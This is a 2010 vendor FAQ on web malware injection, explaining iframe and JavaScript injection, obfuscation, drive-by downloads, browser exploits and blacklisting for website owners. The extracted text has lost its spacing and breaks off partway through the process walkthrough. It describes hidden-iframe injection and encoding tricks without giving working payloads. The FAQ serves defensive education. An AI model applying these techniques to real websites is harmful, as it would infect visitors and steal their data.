WebMalwareInjection FAQ Version1.

0 February12,2010

WebMalwareInjection FrequentlyAskedQuestions(FAQ)
1. 2. 3. 4. 5. 6. 7. 8. 9. 10. 11. 12. 13. 14. 15. 16. 17. 18. 19. 20. 21. 22. 23. 24. 25. 26. WhatisaWebapplication?...........................................................................................................................3 HowareWebapplicationscreated?..............................................................................................................3 WhatarethethreatstoWebapplications?...................................................................................................4 Whatisahacker?..........................................................................................................................................4 WhyareWebapplicationsvulnerabletoHackers?........................................................................................5 Whatismalwareinjection(PartI)?................................................................................................................5 WhatisMalware?.........................................................................................................................................5 Whatismaliciouscode?................................................................................................................................6 InaWebapplicationcontext,whatisinjection?............................................................................................6 Whereisthecodeinjectedto?..................................................................................................................7 Whatisdrivebydownloading?..................................................................................................................8 Whywasmalwareinjectioncreated?........................................................................................................8 Whydoesmalwareinjectionutilizelegitimatewebsites?.....................................................................10 WhyshouldwebsiteownerscareaboutmalwareInjection?....................................................................11 Whyissearchengineblacklistingaconcern?...........................................................................................11 IfmywebsiteisflaggedbyGoogleasmaliciouswhatisthenextstep?....................................................12 WhydoesmalwareinjectiontargetInternetusers?.................................................................................13 WhyshouldInternetuserscareaboutmalwareInjection?.......................................................................13 Whatissocialengineering?.....................................................................................................................13 WhatistheroleofSocialEngineeringinmalwareinjection?....................................................................14 Whatismalwareinjection(PartII)?.........................................................................................................14 Whatarethecomponentsofmalwareinjection?....................................................................................15 Howismaliciouscodeinjectedintoavulnerablewebpage?...................................................................16 WhattypeofmaliciouscodeisinjectedintothevulnerableWebapplication?........................................17 Whatisaniframe?..................................................................................................................................17 Whatisjavascript?..................................................................................................................................17
2010 Armorize Technologies Inc. All Rights Reserved 1

WebMalwareInjection FAQ Version1.0 February12,2010

27. 28. 29. 30. 31. 32. 33. 34. 35. 36. 37. 38. 39. 40. 41. 42. 43. 44. 45. 46.

Whatistherelevanceofiframesandjavascriptinmalwareinjection? ....................................................18 . Whatdoesinjectedcodelooklike? .........................................................................................................18 . Whathappenswhenuserrequestsawebpagewithinjectedcode?........................................................19 Whatismeantbyabrowserexploit ........................................................................................................20 . Whathappensoncethebrowserhasbeenexploited?.............................................................................20 Whatismalwareinjection(PartIII)?........................................................................................................20 HowdoIknowmywebsiteisinfectingmycustomerswithmalware?......................................................22 WhenmanuallytestingforMalwareinjectionwhatprecautionsarenecessary?......................................23 HowdoIknowmywebsitehasbeeninjected?........................................................................................24 Isthereageneralformatforinjectedcode?............................................................................................25 HowcanItellifmywebsitehasinjectediframes?...................................................................................25 HowcanItellifmywebsitehasinjectedjavascript?................................................................................26 Aretheothermeansofmalwareinjectionbesidesiframes?....................................................................29 HowcanItellifmywebsitehasinjectedobjectssuchasflashorPDFs?...................................................30 HowdoIknowmydatabasehasbeeninjected?......................................................................................30 Whatotherservicesmightahackerexploitforinjection?........................................................................31 Ifmywebsiteisinjected,ismywebserverorOperatingSystemalsocompromised?...............................31 Ifawebserverhostsmultiplewebsites,aretheyallaffectedbyasingleinjection?.................................32 IfmywebsiteisdownloadingmalwaretousershowdoImitigate?.........................................................32 IfmywebsiteisdownloadingmalwaretousershowdoIremediate?......................................................33

2010 Armorize Technologies Inc. All Rights Reserved 2

WebMalwareInjection FAQ Version1.0 February12,2010

1. WhatisaWebapplication?
AWebapplication1isasoftwareapplicationthatisaccessedviaawebbrowseroveranetworksuchasthe Internet. Generallyspeaking,WebapplicationsprovidedynamicwebpagesthatfacilitateinteractionbetweenInternet usersandmorecomplexcomponentsthatdriveapplicationssuchasonlinepaymentsystems,socialnetworking sitesorwebbasedemail. Webapplicationtechnologyhasboostedonlinebusinesscapabilitiesandhasenteredthecorporateworkplaceas ameansofreducingoverheadassociatedwithsoftwareinstalledonapercomputerbasis.

2. HowareWebapplicationscreated?
BasicWebapplicationsaretypicallycreatedusingcodewhichthebrowserrendersintoawebpage.Themost typicalexampleofthisisHTML(HyperTextMarkupLanguage)usedinstaticwebsites. HTMLcombinedwithmultimediapluginsandscriptingfunctionalitypresentsmoredynamicfunctionalitytothe browserwhileWebapplicationdevelopmentplatformsanddatabasesprovidebusinesslogicanddatastorage capabilities.Thisenablesdevelopmentofcomplexfeaturerichapplicationsthatcanbedeliveredtoendusersvia webbrowser.

Figure1:BasicWebApplicationArchitecture

AWebapplicationcanbeconsideredamorecomplexandfeaturerichformofthecommonlyusedtermwebsite.Bothareaccessed fromawebbrowserbyanaddressthattakesthehttp://www.abc.comformat.Howeveritisassumedthatawebsitesimplypresents pageswithstaticcontenttoabrowserwhileawebapplicationhashigherlevelcomponentsforbusinesslogicprocessinganddatastorage.

2010 Armorize Technologies Inc. All Rights Reserved 3

WebMalwareInjection FAQ Version1.0 February12,2010

NomatterwhattechnologyisusedtocreatetheWebapplication,itisimportanttonotethatallofitsfeatures arenothingmorethancarefullycodedstatementsthatthebrowserprocessesandpresentstotheenduser. ThiscanbedemonstratedusingastandardwebbrowsersuchasFirefoxorInternetExplorer.Whenviewinga webpage,onthetopmenu,ClickViewandPageSource(Firefox)orSource(IE)toviewtheactualsourcecode fromwhichthedisplayedpagehasbeenrendered.ThisisdemonstratedinFigure2.

Figure2:WebPagewithSourceCode

3. WhatarethethreatstoWebapplications?
Webapplicationspresentthecorporateimagetoaglobalaudience.Thewebsiteisthefirstportofcallfor anyonelookingtolearnmoreaboutgivencompany.However,arealsoexposedtomaliciouselementswhoseek tousethispublicpresenceasmeansofdamagingcorporatereputation,stealingresourcesorasapointfrom whichtolaunchInternetwideinformationsystemattacks.

4. Whatisahacker?
ThetermHackerhasseenmanydefinitionssinceitwascoinedover40yearsago.However,thegeneral consensusnowadaysisthathackersareindividualsorgroupsthatseektocircumventsecuritycontrolsinorderto compromisetheconfidentiality,integrityand/oravailabilityofelectronicinformationsystems. Whiletherearenumeroushackersubclasseswithvaryingtechnologyfocusandskilllevels,thetermHackeris usedexclusivelythroughoutthisdocument.Itisalsoassumedthattheprimarytargetsofhackersattentionare Webapplications.

2010 Armorize Technologies Inc. All Rights Reserved 4

WebMalwareInjection FAQ Version1.0 February12,2010

5. WhyareWebapplicationsvulnerabletoHackers?
Traditionally,whensoftwareapplicationsweredeployed,theywereprotectednotonlybysomeformofuser credentialsbutalsothroughphysicalandnetworklevelseparationfromtherestoftheworld.Howeverwiththe adventofonlinebusiness,amoremobileworkforceandincreasedavailabilityrequirements,theseapplications arenowhostedonWebfacingserverswhicharereachablebyanyonewithaconnectiontotheInternet. TheubiquitousnatureandconstantexposureofWebapplicationscombinedwiththerelativeimmaturityof thetechnologymakesthemparticularlyvulnerabletorepeatedandeverevolvingattacksfromhackerswho comfortablyenjoytheanonymitythattheInternetprovides.

6. Whatismalwareinjection(PartI)?

Malware injection is the act of inserting or injecting malicious code into a web page so that so that when Internetusersbrowsethepagetheircomputer2isinfectedwithmalware. It is important to note that the ultimate target of a malware injection attack is rarely the website itself. The hackergenerallywantstoquietlyinsertcodeintotheWebapplicationinordertocompromiseeverycomputer that browses the website. The methods used to inject code, the types of code and the actual malware categoriesarediscussedinmoredetailthroughoutthisdocument.

7. WhatisMalware?
Malware is the industry term used to generally describe malicious software, i.e., software that is designed to compromisetheconfidentially,integrityoravailabilityofcomputersystems. ThetermMalwareisbroaderthanthebetterknownexpressionVirusasitalsoencompassesWorms,Trojan Horses, Rootkits, Spyware, Adware, Crimeware, Robot (botnet) Clients, etc. A detailed discussion of these specifictermsisbeyondthescopeofthisdocument.FormoreinformationrefertoWikipediasmalwarepage3. Itisassumedthatmalwareisunwantedsoftwarethatinstallswithoutthecomputerusersknowledgeorconsent andresultsinactivitiessuchas:
NotethetermComputerisusedheretorefertoallplatformsusedbyanaverageInternetusersurfingtheweb.Thiscouldbea desktopcomputer,laptop,mobiledevice,smartphoneetc.ItisdistinctfromaServerwhichistheadvancedcomputingplatformusedto hosttheWebapplication.
3

http://en.wikipedia.org/wiki/Malware

2010 Armorize Technologies Inc. All Rights Reserved 5

WebMalwareInjection FAQ Version1.0 February12,2010

Degradedcomputeroperations; Intrusivepopupwindowsthatmayormaynotsolicitpaymentforgoodsandservices; Spamemailpromotingunwantedproducts,servicesoractivitiesdeemeddistastefulorevenillegal; Theftofpersonal,financialorcorporateinformation;or Installationofremotecontrolsoftwarethatallowshackerstocontrolandmonitorcomputeractivities

8. Whatismaliciouscode?
WebapplicationsarebuiltuponcodethatispresentedtoandrenderedintheWebbrowser.WhattheInternet userseeswhentheyaccesstheirfavoritesocialnetworkingsiteissimplycodethathasbeenprocessedbythe browsertoprovidethetext,graphics,forms,video,audio,etc.thatapplicationdeveloperwantspresented. However,itispossiblethatthiscodecanbeusedtoadverselyaffecttheWebbrowser.Ifahackercaninserthis owncodepriortothebrowserprocessingit,itispossiblethathecancontrolwhatthebrowserdoes. Thus it can be said that malicious code in this context is Web application code that when processed by the browsersomehowcompromisesorcontrolsthebrowseractions.Itshouldbenotedthatthisisaverygeneral termandthatthespecificsofmaliciouscodewillbeexaminedinmoredetailthroughoutthisdocument.

9. InaWebapplicationcontext,whatisinjection?
ManyWebapplicationsrequestuserinputthroughmechanismssuchasonlineforms,checkboxes,etc.Inan adequatelysecuredWebapplication,therewillbefiltersinplacetoensurethatdataonlyentersthroughthese interfacesinaformatthatactuallymatcheswhattheapplicationexpects.Forexample,iftheapplicationrequires numbersintheformofabirthdate,itshouldnotacceptletters. Injectioniswhendatathatenterstheapplicationbybypassingsecuritycontrolsandalteringtheapplications behaviorinanunexpectedmanner. Injectioniscommonlyusedbyhackerstoinsertmaliciouscodeintootherwiselegitimatewebpages.Common injectionattacksinclude: Codeinjectionwhichisthegeneralnamegiventoattackswhereadditionalcodeisinsertedintothe application CommandInjectionwherethehackerinsertssystemcommandswiththeaimofhavingthewebserveraccept andprocessthosecommand Databaseinjectionwherethehackerinsertsdatabasecommandsorqueriessothatthedatabaseprocesses themandreturnsaresponse

2010 Armorize Technologies Inc. All Rights Reserved 6

WebMalwareInjection FAQ Version1.0 February12,2010

10.Whereisthecodeinjectedto?
Whendiscussingcodeinjection,itisimportanttonotethattherearemanypossiblescenariosandattack methodsasfollows:

Figure3:Maliciouscodeinjectionpaths

(a) Inthisscenario,thehackerutilizesapplicationformfieldstopassunfiltereddatabasequeriestodatabase. Heeithercircumventsdatabaseaccesscontrolsorgainsaccesstothepasswordsstoredintheaccount database.Oncehehascontrolofthedatabase,hecanwritecontentthatisechoedbackwhenpagesare requested. (b) ThehackerexploitsadditionalvulnerableservicessuchasFTPorSMTP.Thismaybethroughspecific vulnerabilitiesorthroughpasswordsobtainedfromhackerforumsorthroughsocialengineering.Thisgives thehackeraccesstotheserverandthustotheapplicationfilesandcode. (c) ThehackergainsdirectaccesstotheserverOperatingSystem(OS)througheitheravulnerableserviceor withstolencredentials.Oncethisaccessisgainedthehackercandirectaccesstotheapplicationfilesand code. (d) Insomecases,thehackermaybeabletodirectlycompromisethewebapplicationitself:

2010 Armorize Technologies Inc. All Rights Reserved 7

WebMalwareInjection FAQ Version1.0 February12,2010

- Iftheapplicationrequiresuserinput,thehackermayprovidedatathatwritestoafileonthelocal

harddrive.Incertaincases,itmaybepossibletoincludeexecutabledatainthisinputwhichinturn wouldeitherretrievepassworddataorcircumventaccesscontrols. - Many web servers are vulnerable by default; either through vulnerabilities that require patching afterinstallationorthroughdefaultconfigurationandcredentials.Forexample,manywebservers comewithawebbasedadministrationconsole.Ifahackercanexploitthiswebapplication,hecan controltheentirewebserver. - WebapplicationfilesaretypicallystoredwithintheOSfolderstructure.Incertainwebservers,it may be possible to execute an attack such as Path Traversal4to browse through the folder structureandaccessfilesoutsidethewebapplication.

11.Whatisdrivebydownloading?

Malwarecanbedownloadedtoendusercomputersfromcompromisedwebsitesthroughanumberofmethods. Traditionally, some user interaction was required and people were often lured to a website and persuaded to clickonalinkwhichresultedinmalwaredownloadingandexecutingontheircomputers. However, the term driveby downloading specifically refers to the case where no enduser interaction is required.Itisenoughtosimplyvisitthewebpagethathasbeeninjected.Thereisnorequirementtoclickonany link. Therealseverityofthisparticulartypeofattackisthatitisentirelysilent.Itquietlydownloadsmalwarewithout theusersknowledgeorconsent.Generally,websiteownershavenoideathatthisattackhasoccurredandthat theirwebsiteisleadingtoseriouscompromiseoftheirowncustomerssecurity For example, in 2009 a majorUS newspaper was compromised through an advertisement in its online edition. Internet users browsing the web page hosting the advertisement automatically and unknowingly downloaded malwarewithouthavingtoclickonanylinks.

12.Whywasmalwareinjectioncreated?

Whenmalwarefirstcametothefore,theimpactwaslargelydisruptiveand/orembarrassing.Commonimpacts includeautomatedmassemailingtoallcontactsintheinfectedcomputersoutlookaddressbookorinsertionof offensivefilestostoreddata.Inextremecases,filesweredeletedfrominfectedcomputerswhichimpacteduser productivityanddamagedfaithininformationsystemsasacorporatetool.

4

FormoreinformationonPathTraversalrefertotheOpenWebApplicationSecurityProject(OWASP) http://www.owasp.org/index.php/Testing_for_Path_Traversal 2010 Armorize Technologies Inc. All Rights Reserved 8

WebMalwareInjection FAQ Version1.0 February12,2010

With the emergence of the Internet, hackers have focused more on Web applications but even this has had distinctphasesasoutlinedinFigure4.

Figure4:WebApplicationAttackComplexityvs.Goals

Initial website attacks were directed at the corporation itself with the primary goal being prominent website defacementandthebraggingrightsthatcamewithit. AstheInternetbecameanacceptedbusinesstool,attackerschangedtheirfocustoeCommercewebsiteswith theintentionofstealinginformationsuchascreditcardnumbersfromcorporatedatabases. HoweverwiththeadventofWeb2.0,improvementsin creditcardprotectionmechanismsandanincreasingly wiredgeneralpopulation,hackershaverealizedthatendusersPCsrepresentfareasiertargetsforprofitdriven criminalenterprises. Modern malware activities are typically designed to compromise information stored on Internet users computerssuchaswebbankingcredentialsoremail,filesharingandsocialnetworksitepasswords.
2010 Armorize Technologies Inc. All Rights Reserved 9

WebMalwareInjection FAQ Version1.0 February12,2010

Attackersaregenerallyaffiliatedwithorganizedcrimeandhaveestablishedabusinessmodelbasedonbuying and selling malicious code or active malware with guaranteed antivirus evasion capability. There are even defined price structures for information such as credit card numbers, social networking credentials, social securitynumbers,etc.

13.Whydoesmalwareinjectionutilizelegitimatewebsites?

Malwaredeveloperstargetvulnerablewebsitesasarouteformalwareinjectionforanumberofreasons. Improved perimeter security technologies have made traditional network and systemlevel attacks more difficult to execute. But system and network security is not the same as application security. With the adventofWeb2.0,manybusinesses,inarushtodevelopanonlinepresence,havefailedtosecuretheirWeb applicationsatthecodelevel.ThishasprovidedanewattackavenueforhackerswithSQLInjectionandCross SiteScripting(XSS)capabilities. AsWebapplicationsareaccessibletobothdesirable(customers)andundesirable(hackers)Internetusersby design, there is essentially an open channel between the untrusted Internet and corporate systems as illustratedinFigure5.

Figure5:HackersexploitvulnerableWebapplicationthroughopenports

2010 Armorize Technologies Inc. All Rights Reserved 10

WebMalwareInjection FAQ Version1.0 February12,2010

Byleveragingvulnerablewebsites,hackerscansilentlydownloadandexecutemalwareonthecomputerof everyuserwhoaccessesthesite.Vulnerablewebsitesexposetheirentireuserbaseandhackersnowhavean avenuefordistributingmalwaretothousandsorevenmillionsofusers. AstheinjectedwebsitemerelyservesasaconduitthatredirectsInternetusercomputerstomalwaresites (oftenviamultiplehoppoints),itisharderforforensicanalysistoidentifytheactualmalwaresource.

14.WhyshouldwebsiteownerscareaboutmalwareInjection?

When a vulnerable website is injected in this manner, it becomes a conduit for malware delivery to all computersbrowsingthesite.Thismalwareistypicallydesignedtostealinformationfromcomputersbrowsing theinfectedsites. Thecorporatewebsiterepresentsacompanyspublicface.Ifitisinfectingthecomputersoftheverypeopleitis supposedtoserve,itcannotbetrusted.Withoutthistrust,websitetrafficwilldecreasewhichinturnwillleadto areducedmarketingprofileandlostsalesopportunities. If a website develops a reputation as a source of malware, business reputation will be severely impacted. In addition, malware injection will lead to noncompliance with standards such as PCI and may even bring legal consequencesifcustomerconfidentialityorprivacyhavebeenimpacted. In addition, if a website is downloading malware to computers browsing it, it will be flagged as malicious by searchenginessuchasGoogleandmayeventuallybedroppedfromsearchqueryresults.

15.Whyissearchengineblacklistingaconcern?
WiththeadventofGoogleSafeBrowsingandGooglesabilitytoflagsitessuspectedofbeingmalwaresources, malwareinjectionsimpactisgrowingevermoreimmediate.If,duringaGoogleindexcycle,awebsiteappearsto behostingmalware,thesitewillbeflagged.ThismeansthatuserswhoaccessaflaggedsiteviaGooglewillbe givenanominouswarningsimilartothatshowninFigure6.

2010 Armorize Technologies Inc. All Rights Reserved 11

WebMalwareInjection FAQ Version1.0 February12,2010

Figure6:GoogleSafeBrowsingFlagsWebsiteswithMalware

Ifthewebsiteremainsinfected,itmayeventuallybedroppedcompletelyfromGooglessearchresults.Evenif the malware is removed from the website immediately, the site will stay flagged for a significant timeperiod, drivingcustomersaway.Inordertoremovethisstatus,websiteownersmustsubmitproofthattheirwebsiteis malwarefree.WebsitesflaggedbyGoogleasmaliciousaredocumentedathttp://www.stopbadware.org.

Given the importance of Search Engine Optimization (SEO) as a marketing tool, there is no doubt that Google flaggingawebsiteasmaliciousordroppingitfromsearchresultsisnotgoodforbusiness.

16.IfmywebsiteisflaggedbyGoogleasmaliciouswhatisthenextstep?
OnceawebsitehasbeenflaggedasmaliciousbyasearchenginesuchasGoogle,itiscriticaltoremoveinjected codeinordertostopthedrivebydownload.Fordetailsonidentifyinginjectedcodereferto(28).Forimmediate mitigationstepsaswellasmorethoroughremediationreferto(45)and(46). Oncetheinjectedcodehasbeenremovedandithasbeenverifiedthatmalwareisnolongerbeingpushedto Internetusercomputers,itispossibletorequestanewwebsitereview.

2010 Armorize Technologies Inc. All Rights Reserved 12

WebMalwareInjection FAQ Version1.0 February12,2010

SitesflaggedbyGoogleasmaliciousarelistedathttp://stopbadware.organdtheinstructionsonrequestinga reviewarelistedathttp://stopbadware.org/home/reviewinfo.

17.WhydoesmalwareinjectiontargetInternetusers?
Increased publicity and awareness hasmade it difficult to compromise corporate resources from the Internet butanincreasinglywiredgeneralpublicissharingmoreandmoreinformationviatheInternet.TheseInternet users: Storepersonal,businessandothersensitivedataoncomputersconnectedtoInternet. Generallytrustanywebsitetheychoosetoaccesswhetherbrowsingdirectly,accessingviasearchengineor clickingonalinksentfromafriend. Rely on commercial antivirus solutions for security. These are often outdated due to failure to update signatures. In addition, advances in obfuscation and packing techniques have resulted in most malware beingundetectablebycommercialantivirusscanners. Theresultisamassiveamountofcomputerswithpersonal/financialinformationliveontheInternet.Theyare largely protected by inadequate security mechanisms and are powered by users who implicitly trust websites thatarevulnerabletomaliciouscodeinjection.Byleveragingvulnerablewebsites,hackersnowhaveanavenue fordistributingmalwaretothousandsorevenmillionsofusers.

18.WhyshouldInternetuserscareaboutmalwareInjection?

When Internet users browse to a compromised website, the injected code causes hackercreated content to executeintheirbrowseralongwiththelegitimatewebsitecontent. Thehackers ultimategoalistoforce theuserscomputertosilentlydownloadandinstallmalwarefromasite that the hacker specifies. This malware typically grants the hacker full control over the PC including access to stored,processedortransmitteddata. Theimpactofmalwareinjectionisstoleninformationsuchasonlinebankingcredentialsandcreditcarddetails. Theft of personal information in this manner also leads to increased incidences of email hijacking, fraudulent accesstosocialnetworksitesand,inmanycases,fullblownidentitytheft.

19.Whatissocialengineering?

2010 Armorize Technologies Inc. All Rights Reserved 13

WebMalwareInjection FAQ Version1.0 February12,2010

Socialengineeringrevolvesaroundpersuadingormanipulatingpeopleintorevealinginformationorperforming specificactions.Inacomputersecuritycontext,socialengineeringmeansexploitingpeoplethroughdeception ratherthanfocusingoncircumventingtechnologicalcontrols.

20.WhatistheroleofSocialEngineeringinmalwareinjection?

IfInternetuserscanbeattractedtowebsitescontaininghypedcontentsuchascelebritysextapesoradvance moviecopies,theybecometargetsformalwareinjection. In2008,sexuallyexplicitphotosofHongKongmoviestarEdisonChenwithnumerousfemalecelebritieswere released on the Internet. Armorize Technologies, working with law enforcement and cybersecurity agencies throughout theregionquicklyuncoverednumerous websitesthatenticedInternetuserswithpromisesofthe photos in question but actually subjected them to malware injection. By taking advantage of the hype surroundingthephotos,hackersfoundamassivetargetbaseforpersonaldatatheft. In this example, there was no requirement for userinteraction. The malware download happened invisibly as soonasthebrowserdisplayedtheexpectedpage.

21.Whatismalwareinjection(PartII)?
Havingreviewedsomeconceptscriticaltoanunderstandingofmalwareinjection,itistimetolookalittledeeper athowmalwareinjectionworks. Malware Injection also known as driveby downloading is a hacker technique designed to steal information fromInternetusersbyforcingthemtoautomaticallydownloadmalicioussoftwarewithout theirknowledgeor consent. Morespecifically,thehackerexploitsfundamentalWebapplicationvulnerabilitiessuchaspoorapplicationinput filteringinordertoinjectamaliciousiframeorjavascriptintotheWebapplication. Ataveryhighlevel,theconceptcanbeillustratedasinFigure7.Howeveritshouldbenotedthattheprocessis actuallymorecomplexandthisispresentedfromtheperspectiveofanenduserwhohasbeencompromised. WhiletheinjectedWebapplicationmayalsobeontheserverhostingthemalwareitismoretypicalforittoact merelyasaconduitformalwareinjectionbyensuringthebrowserprocessesmaliciouscodethatcompromisesit.

2010 Armorize Technologies Inc. All Rights Reserved 14

WebMalwareInjection FAQ Version1.0 February12,2010

Figure7:BasicDrivebyDownloadConcept

22.Whatarethecomponentsofmalwareinjection?
Inatypicalmalwareinjectionscenario,thehackersendgoalistotakecontroloftheendusercomputer.Ata highlevelandinthemosttypicalexample,malwareinjectionrequires3componentsasfollows: Maliciouscode:Ifthewebsiteisvulnerabletoinjectionattacks,thehackerwillinsertcodethatwillbeprocessed byanybrowserrequestingtheinjectedwebpage.Thiswillcausethebrowsertorequestcontentfromanother websitecontrolledthehacker Exploit:Theexploitiswhatactuallytakesadvantageofsecurityflawsintheenduserswebbrowser.Ifthe exploitissuccessful,thehackerwillhavefullcontrolofthewebbrowser.Theexploitistypicallydownloaded fromthewebsitethattheinjectedcoderedirectthebrowserto. Malware:Oncethebrowserhasbeenexploited,itcanbeinstructedtocarryoutanyactionthehackerrequests. Typicallythisincludesaccessinganotherhackercontrolledwebsiteorservertodownloadactivemalware.

Theoverallprocesscanbesummarizedasfollows: Injectingavulnerablewebsitewithmaliciouscodethatwebbrowserswillprocess Usingthisinjectedcodetoexploitwebbrowserstotakecontrolofthem; ForcingtheexploitedwebbrowsertodownloadmalwaretoInternetuserscomputers;and Silentlyexecutingandinstallingthismalwareonendusercomputers

2010 Armorize Technologies Inc. All Rights Reserved 15

WebMalwareInjection FAQ Version1.0 February12,2010

The payload of this malware may vary but it typically includes software that grants the hacker the ability to remotelycontrolthecomputer,viewvideooutput,capturekeystrokesandsearchthroughtheharddiskfordata suchascreditcardnumbers,storedcredentialsforbanking,socialnetworkandwebmailsites. Note that this list is far from exhaustive. New malware is released weekly with ever more complex behavioral characteristicsandgoals.

23.Howismaliciouscodeinjectedintoavulnerablewebpage?
Many Web applications request user input through form fields. That input is then processed with the results relayedbacktotheenduser. Webapplicationdevelopersshouldensurethatdataisprocessedinaccordancewiththeapplicationsbusiness rulesandthatserver,applicationordatabasecommandsarenotsuppliedtotheapplicationthroughthisavenue. Thisrequiresfilteringapplicationinputtoensurethatonlydatadeemedvalidinaccordancewiththeapplication expectations is accepted. For example, if the application expects numeric data from an input field, then any othertypeofdatashouldeithergeneratearequestforproperlyformatteddata,bereplacedwithdefaultdata orbeignored. However, many Web applications are developed without these controls in place. It is common for poorly securedWebapplicationstoacceptcommandsthroughformfieldswhicharethenpassedtotheotherbackend systems powering the applications such as the web server, server operating system or database for processing. With suitably crafted commands passing through the web form to the core application, server or database, a hackercanfreelyinjectthecontentrequiredforsuccessfulmalwareinjection.Typicalinjectionattacksinclude thefollowing: FullPathDisclosure ArgumentInjectionorModification LDAPinjection BlindSQLInjection BlindXPathInjection ParameterDelimiter CodeInjection ServerSideIncludes(SSI)Injection CommandInjection SpecialElementInjection DirectStaticCodeInjection WebParameterTampering Formatstringattack XPATHInjection For more information on Injection attacks refer to the Open Web Application Security Project (OWASP) at http://www.owasp.org/index.php/Category:Injection

2010 Armorize Technologies Inc. All Rights Reserved 16

WebMalwareInjection FAQ Version1.0 February12,2010

24.WhattypeofmaliciouscodeisinjectedintothevulnerableWebapplication?
In the most common example, the hacker injects code into the Web application that is rendered in the web browser The hackers goal is to have the browser process his code without either the web application administrator or endusersknowledgeorconsent.Thisiscommonlyachievedthroughinjectionofmaliciouscontentsuchas: Iframes Javascript Objects Databasequeriesorcommands

25.Whatisaniframe?

AninlineframeoriframecausesanHTMLdocumentfromanexternaldomaintorenderinsidearequested webpage. Iframe syntax utilizes the HTML <iframe></iframe> tag and allows specification of a number of parameterssuchas: Actualwebsitefromwhichiframecontentisretrieved PositionoftheIframewithintheoverallwebpage Displaydimensionswhichcanbesettozero Displaystatuswhichcanbesettonone Thereforeitispossibletouseaniframetoembedcontentfroma3rdpartywebsiteandhaveitrenderinvisiblyin thewebbrowserwhenanotherwiselegitimatewebpageisrequested.Atypicaliframeisshownbelow.Ifthis was inserted into a corporate home page, content from page.html would render when the home page was openedinthebrowser.

26.Whatisjavascript?
2010 Armorize Technologies Inc. All Rights Reserved 17

WebMalwareInjection FAQ Version1.0 February12,2010

JavaScriptisascriptinglanguagethatisinterpreted byWebbrowsers.ItallowsWebapplicationdevelopersto controlandaugmentbrowserfunctionalityandtoadddynamicfeaturesthatcannoteasilybeachievedthrough HTML. Typicallyjavascriptfunctionalityincludesvisualeffects,formfieldvalidationandthedynamiccreationofevent dialogsandnewwindows.Itisalsopossibletousejavascripttodynamicallycreateiframes.Thiswouldmakethe iframemoredifficulttofindthroughrudimentaryvisualinspection.

27.Whatistherelevanceofiframesandjavascriptinmalwareinjection?
Inmalwareinjectionscenarios,hackerstakeadvantageofvulnerableWebapplicationstoinjectmaliciousiframes intootherwiselegitimateandtypicallypopularwebpages.TheinjectediframewilleitherusestandardHTML syntaxorcanbeintheformofjavascriptwhichwilldynamicallycreatetheiframewhenthepageisdisplayedin thebrowser. Whatevertheinjectionmethod,thegoalisthesame.Theiframecausesa3rdpartywebpagetorenderinsidethe requestedwebpage.Thisisused tocallupanexternalexploitdesignedto compromisethewebbrowserthat requeststhatpage.

28.Whatdoesinjectedcodelooklike?
Themostbasicformofinjectedcodeisamaliciousiframesuchas: If this iframe is present in the HTML of a requested web page it would cause content from http://www.example.com/page_with_malware.htmtorenderinaninvisible1pixelx1pixelwindow. However,typicallywhenhackersinjectaniframeintoawebsitetheymaydisguisethecodebymakingitlooklike something else. For example, the injected iframe code can be scrambled or encoded so that visually it looks nothingliketheoriginalsyntaxbutactsasnormalwhenexecutedasawebpage. NotethatthisdoesnotprotectorencryptHTMLcodebutsimplyservestohideitfromsomeonelookingforan iframe.ForexampletheiframereferencedearliercanbeconvertedtoaJavaScriptUnicodestringusingafreely availableencodingtool 5.Theprocessofdisguisingcodethroughscramblingorencodingisgenericallyreferredto asobfuscation.
5

http://www.auditmypc.com/html-encoder.asp 2010 Armorize Technologies Inc. All Rights Reserved 18

WebMalwareInjection FAQ Version1.0 February12,2010

29.Whathappenswhenuserrequestsawebpagewithinjectedcode?

In the above example, when an Internet user browses to the injected web page, the javascript dynamically generatesaniframe.Thiscausesmaliciouscontentfromawebsitecontrolledbythehackertoexecuteinsidethe requested(andpresumedlegitimate)webpage. ThishackercontrolledwebsiteisoftenreferredtoastheHopPointandcontainstheactualattackdirectedat theWebbrowser.ThemalwareinjectionprocessisdescribedinmoredetailinFigure8. In the case of an exploit that is loaded from the Hop Point through the iframe, the target is typically the web browseritself.Inonecommonexample,theexploitengagesinaparticularattackcalledHeapSpraying6which resultsininstallationofaspecificpiecesetofinstructionsthatthebrowserexecutes.
A discussion of Heap Spray attack is beyond the scope of this document. Refer to http://en.wikipedia.org/wiki/Heap_spraying for more information. 2010 Armorize Technologies Inc. All Rights Reserved 19
6

WebMalwareInjection FAQ Version1.0 February12,2010

30.Whatismeantbyabrowserexploit
Theinitialgoaloftheinjectediframeistorendercontentfromawebsitecontrolledbythehackerinsidethe requestedwebpage. Theiframecontenttypicallycontainsawebbrowserexploit,i.e.,codethatexploitssoftwareflawsinaweb browserinordertoforceittodosomethingunexpectedsuchascrashingorreading/writingdataonlocalhard drive. Appropriatelycraftedexploitcodewillcausethebrowsertofallundercontrolofthehacker.Itwillthenaccept commandsembeddedintheexploitandwillcarryouttasksassignedittobythosecommands. Alternatively,theexploitmaybespecifictoanynumberofbrowserextensionssuchasthosethatsupportPDF, Flash,etc.Ineithercase,thegoalistotakecontrolofthebrowser,forcingittoperformtasksspecifiedbythe hacker.

31.Whathappensoncethebrowserhasbeenexploited?
Theprimarygoaloftheexploitistoforcethewebbrowsertoconnecttoamalicioussiteinordertodownload malwaresuchasremotecontrolutilitiesandbackdoorsaswellasprogramsthatautomaticallycrawlthehard diskinsearchofinformationsuchascreditcarddetailsorbankaccounts.

32.Whatismalwareinjection(PartIII)?
Nowwehavereviewedbasicandintermediateconcepts,we canlookinmoredetailatthemalwareinjection process.AtypicalmalwareinjectionscenarioisillustratedinFigure8.

2010 Armorize Technologies Inc. All Rights Reserved 20

WebMalwareInjection FAQ Version1.0 February12,2010

Figure8:MalwareInjectionProcessFlow

Step1Maliciousiframeinjection ThehackertakesadvantagesofWebapplicationvulnerabilitiestoinjectamaliciousiframeintooneormoreweb pages.TheinjectionistypicallyeitherinHTMLcode(orjavascriptthatdynamicallygeneratestheiframewhen thebrowserrequeststhewebpage).Inaddition,theinjectedcodeisusuallyscrambledorencodedtomakeit moredifficulttodiscoverbybothautomatedandmanualinspection. Step2BrowserExploitplacedonHoppoint

2010 Armorize Technologies Inc. All Rights Reserved 21

WebMalwareInjection FAQ Version1.0 February12,2010

